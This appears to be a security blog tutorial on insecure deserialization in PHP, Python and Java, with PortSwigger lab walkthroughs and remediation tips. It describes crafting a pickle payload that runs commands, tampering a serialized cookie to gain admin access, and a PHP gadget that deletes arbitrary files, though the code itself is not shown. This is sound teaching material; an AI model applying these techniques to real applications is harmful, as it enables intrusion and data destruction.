Insecure Deserialization - Overview, Exploitation and Remediation
Insecure Deserialization is a concept that is often conveyed as one of the harder vulnerabilities to exploit, and I for one struggled to get my head around it initially. This has led to the creation of this post, where I'll be attempting to break down the concepts behind it and how it can be exploited, whilst also offering some advice for ensuring your code is secure as a developer. I'll be demonstrating some lab exercises from Burpsuite's Web Academy whilst trying to break down some of the jargon and provide some metaphors to illustrate the concepts.
Let's get started!
Note: I've written most of this in PHP but it applies to multiple languages, including Ruby, Java, Python. Anything that allows objects to be serialized (Python serialization might be known as "pickling", but it's the same concept).
What is Serialization? Can I Eat Them?
To understand what insecure deserialization is, and therefore how to exploit it, it's fundamental to understand what serialization is, in programming terms. When complex programs are created, often developers use objects to give a shell structure to items that get repeatedly used or altered in their code. Since these objects can have complex structures, serialization allows for them to be "flattened" into a string that contains the values of the object in a compact and streamlined format. This makes it ideal for scenarios such as writing data to files or databases, and also sending data over a network between different parts of an application. It allows the data to maintain its accuracy and transfer in a stream of bytes, whilst maintaining the values that were assigned to it.
Take the example below, whereby I've made an object for a handsome chap called Toby, a 25 year old humanoid. We instantiate the MyObject
class and give it some public properties, which we can then set later in the code. Simple enough, but if you're struggling, imagine the object itself as the shell of a car and the properties you add are the parts that make it that specific car. The shell can stay the same, but you can instantiate different internal parts to make a new car each time, without having to completely create a new car from scratch. At the end, I've printed out a dump of the object that got created and then also the ran the serialize function on it.
Let's see what the data looks like in both formats.
The serialized data is in one long stream, and contains the characteristics of the object, with representations for "O" used for an object, "s" for a string, and "i" for an integer followed by the data. Comparing this to the dumped values of the object, it's evident how serializing much more complex objects than the simple one demonstrated could make the transportation and handling of data between applications easier, right? Right!
Therefore, if that's serialization, then deserialization is just the process... reversed? Yes! When an object gets deserialized, it essentially gets pieced back together to its original state, which then allows the receiving application to work with it as it was originally created.
Now you might be wondering whether public and private fields get serialized from objects. Yes, they do. In fact, the only way to stop an object's attribute getting serialized is to mark it "transient" when it is created.
But how is this Insecure?
Whoa, hold your horses! The act of serialization alone is not insecure, inherently. Insecure deserialization arises when an application deserializes data that wasn't actually the data that was intended to be deserialized. Yes, that means that once again, the culprit for this vulnerability is uncontrolled and un-sanitized user input. Once they get their own code into the application, it's generally going to be game over. Insecure deserialization often leads to remote code execution, which obviously, is a big no-no in the eyes of your website. Unlike sanitizing input fields for SQL Injections, or XSS, it's really hard to account for every eventuality that an attacker could pass to the deserialization function, so it's probably best to just never accept any user input that will be used in serialization or deserialization scenarios. I mean, by the time you've deserialized their input and checked that it's valid, the function to deserialize it may have already triggered whatever malicious content was inside, so it's too late then.
But how can I Identify Insecure Deserialization?
Obviously, having the source code is a massive help in identifying insecure deserialization as you can see where objects are serialized, check if they are somehow susceptible to user input and then work on manipulating them. However, it can be just as easy performing a black box test if you can identify positions where data is being serialized and passed to the back end. Understanding what serialized data looks like is key to this stage. I've broken different types of serialized data down below with accompanying code, so if you see anything like this, I hope your spider-senses start to tingle. Have a play with the code yourself, see if you can identify how changes you make affect the serialized object!
PHP Serialization Example
We looked at this one above. PHP uses serialize() and unserialize() as their native functions for performing these actions. Performing a white box test? Look for these, amongst others.
The serialized object will look like this:
Python Serialization Example
Python utilizes the pickle library for serialization and deserialization of data. When code gets deserialized by the pickle library, it will execute under the context of the underlying python process. When an object in python gets pickled (serialized) it calls the __reduce__
method as a way of imploring the library about how to serialize the object. Since the __reduce__
can return either a string or a tuple of up to 6 items, it is possible to pass a command with arguments to this which then gets executed. Let's take a look at what the data looks like. Create a quick vulnerable app with flask using the code below.
This application receives a post request with the danger
parameter in the form of a picked object and then uses pickle.loads
to deserialize it. To generate the malicious payload, we'll use the code below to run a simple id; hostname
.
This creates an object like the one seen below.
Sending this to the vulnerable application results in the object getting executed on the server.
This is a small, quick and dirty example of a blind deserialization, but if it prints the result then you could well have RCE with output too!
Java Serialization Example
Java is a bit more complex as it uses binary serialization formats. Unlike, for example, PHP, it's not as easy to identify or read. However, they will always begin with the same bytes ac ed
in hex and rO0
in base64 encoded examples. In Java, the native interface that initiates serialization is the java.io.Serializable
one. Anything that gets read in using the readObject()
method is a scenario whereby data is being deserialized from an InputStream
, and anything written using the writeObject()
is an case of serialization. Let's look at a quick example. Code has been modified from some of the references given at the bottom.
When deserialized, this code will generate a serialized object that calls the command id;hostname
. The serialized object, as mentioned above, will always start with rO0
if it has been base64 encoded and is the key pointer to a serialized object in java, so keep your eyes out.
A common tool used for attacking deserialization vulnerabilities is ysoserial which helps to generate gadgets and payloads against specific targets, helping you automate the process of creating your own classes. I HIGHLY recommend checking out this link from thehackerish as I learnt an invaluable amount reading it and also they provide a way to set up your own testing environment with free code examples!
Exploiting Insecure Deserialization - Example 1
Let's take the following example. A web application uses a cookie that contains a serialized object to check whether or not the user is an administrator and provides no checks on the integrity of the data. Our account page looks like this.
If we intercept the request, the cookie might look like the one below.
If we URL decode it then base64 decode it, we can see the attributes it holds.
Let's change the admin boolean to a 1, from a 0, then re-base64 and URL encode it and then send the request on. Just like magic, we now have access to the Administrator panel!
That's one example of insecure deserialization allowing us to change the attributes of users as the object was insecurely stored in the cookie parameter! Let's take a more complex example. +
Exploiting Insecure Deserialization - Example 2
Once again, we're looking at a session cookie that has been created with a serialized object,
And let's assume this is a white box test, or that we've found the source code lying around in a backup file.
Toward the bottom, notice the call to __destruct()
which will call the unlink
function, meaning it will delete the specified object in $this->lock_file_path
. Since we can provide an object of any type to the cookie, if we provide a valid one for the above source code, it should accept it without checking if it's what it expects. We'll start by reconstructing the object itself, CustomTemplate, and providing a malicious value for the $lock_file_path
variable. In theory, it should then call the __destruct()
function on the file we specify.
Providing this as a cookie and then base64 and URL encoding it should then perform our required action and delete the specified file.
It's hard to show as it was on the Burp Web Academy instance, but it did work (promise)!
That just about wraps up the small few examples but head over to the Portswigger Web Academy labs for deserialization if you want to take on some of these challenges on your own!
Remediation - How can I avoid this happening to me?!
I'm glad you asked! As previously mentioned, one of the best things you can do is to not allow for the deserialization of any type of user input. Strings, binaries, cookies.. Where it's possible, someone will find a way to do it. Let's remember; attackers are often unconstrained by time. With consequences as severe as a potential remote code execution, they won't be giving up easily if they can find somewhere that deserializes their input just because there's a few filters blocking their way...
"But Toby.. I can't do that, it would break my application"
If you truly must allow user input to go through the process, try implementing one or more of the following security measures in your code.
- Integrity checks! Run a digital signature check on the potentially exploitable object BEFORE it gets deserialized. Doesn't match? Doesn't get opened!
- Deserialize in a lower privileged context of the application. I don't like suggesting this, but it's at least some form of damage control.
- Review your logs! You know your site best, what users do and what's normal. If there's repeated failed deserialization attempts, hits against filters, unusual account activity. Review it. See what they're trying to do and then reactively make changes.
Closing Thoughts
If you've read this far, I commend you and applaud you. I hope it provided a high level overview of deserialization and how it can be used maliciously against an application, and gave food for thought about WHY you should care about it. There's a wealth of incredible information out there that delves deeper into the topic, so if it's piqued your interest, go and read some blogs from people who are far more experienced than me!
Take care and be safe out there, the internet can be a dangerous place.